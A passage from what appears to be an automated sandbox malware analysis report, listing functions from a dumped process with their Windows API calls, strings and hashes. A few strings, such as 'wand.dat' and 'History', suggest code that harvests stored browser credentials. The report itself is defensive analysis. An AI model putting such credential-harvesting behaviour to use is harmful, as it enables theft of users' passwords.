                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                      Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                      • API String ID: 3510742995-272990098
                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                      Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: gj
                      • API String ID: 1297977491-4203073231
                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                      Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                      • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                      Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                      Download Yara Rule
                      APIs
                      • AreFileApisANSI.KERNEL32 ref: 00417497
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                      • malloc.MSVCRT ref: 004174BD
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                      • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                      • String ID:
                      • API String ID: 2903831945-0
                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                      Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(?), ref: 0040D453
                      • GetWindowRect.USER32(?,?), ref: 0040D460
                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Rect$ClientParentPoints
                      • String ID:
                      • API String ID: 4247780290-0
                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                      Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                      • memset.MSVCRT ref: 004450CD
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                      • String ID:
                      • API String ID: 1471605966-0
                      • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                      • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                      Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                      Download Yara Rule
                      APIs
                      • wcscpy.MSVCRT ref: 0044475F
                      • wcscat.MSVCRT ref: 0044476E
                      • wcscat.MSVCRT ref: 0044477F
                      • wcscat.MSVCRT ref: 0044478E
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                      • String ID: \StringFileInfo\
                      • API String ID: 102104167-2245444037
                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                      Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                      Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$??3@
                      • String ID: g4@
                      • API String ID: 3314356048-2133833424
                      • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                      • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                      Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _memicmpwcslen
                      • String ID: @@@@$History
                      • API String ID: 1872909662-685208920
                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                      Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004100FB
                      • memset.MSVCRT ref: 00410112
                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                      • _snwprintf.MSVCRT ref: 00410141
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_snwprintf_wcslwrwcscpy
                      • String ID: </%s>
                      • API String ID: 3400436232-259020660
                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                      Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040D58D
                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ChildEnumTextWindowWindowsmemset
                      • String ID: caption
                      • API String ID: 1523050162-4135340389
                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                      Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                      • String ID: MS Sans Serif
                      • API String ID: 210187428-168460110
                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                      Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ClassName_wcsicmpmemset
                      • String ID: edit
                      • API String ID: 2747424523-2167791130
                      • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                      • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                      Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID: SHAutoComplete$shlwapi.dll
                      • API String ID: 3150196962-1506664499
                      • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                      • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                      Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memcmp
                      • String ID:
                      • API String ID: 3384217055-0
                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                      Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                      Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                      • GetMenu.USER32(?), ref: 00410F8D
                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                      • String ID:
                      • API String ID: 1889144086-0
                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                      Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                      • GetLastError.KERNEL32 ref: 0041810A
                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$CloseCreateErrorHandleLastMappingView
                      • String ID:
                      • API String ID: 1661045500-0
                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                      Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                      • memcpy.MSVCRT ref: 0042EC7A
                      Strings
                      • Cannot add a column to a view, xrefs: 0042EBE8
                      • virtual tables may not be altered, xrefs: 0042EBD2
                      • sqlite_altertab_%s, xrefs: 0042EC4C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                      • API String ID: 1297977491-2063813899
                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                      Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040560C
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                      • String ID: *.*$dat$wand.dat
                      • API String ID: 2618321458-1828844352
                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                      Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                      • wcslen.MSVCRT ref: 00410C74
                      • _wtoi.MSVCRT ref: 00410C80
                      • _wcsicmp.MSVCRT ref: 00410CCE
                      • _wcsicmp.MSVCRT ref: 00410CDF
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                      • String ID:
                      • API String ID: 1549203181-0
                      • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                      • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                      Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00412057
                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                      • GetKeyState.USER32(00000010), ref: 0041210D
                      Memory Dump Source
